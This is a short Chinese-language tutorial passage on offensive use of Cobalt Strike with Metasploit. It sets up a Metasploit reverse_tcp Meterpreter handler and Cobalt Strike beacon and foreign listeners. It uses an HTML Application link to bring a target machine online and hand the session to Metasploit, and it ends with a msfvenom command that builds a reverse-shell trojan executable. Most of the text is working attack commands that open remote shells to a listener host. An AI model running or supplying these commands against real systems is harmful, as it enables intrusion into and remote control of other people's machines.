0x00 前言
继前一章介绍了Cobalt Strike的基本用法,本章接着介绍如何攻击、提权、维权等。
0x01 与Metasploit联动
Cobalt Strike → Metasploit
msf开启监听模式
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.183.147
set lport 4444
run -j
创建两个监听器,一个使用windows/beacon_http/reverse_http来监听肉鸡,另一个使用windows/foreign/reverse_http来将获取到的控制权传给msf(注意:这里的端口要与msf监听的端口一致)
利用HTML Application来生成链接,使得目标设备上线,右击选择spwan,选择msf监听器,点击Choose
返回msf查看,成功获取meterpreter会话(此方法获取到的会话并不稳定,具体原因未知)
Metasploit→ Cobalt Strike
当然这里也可以通过用msfvenom生成木马,再由CS发布
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.183.147 lport=4444 -f exe -o msf.exe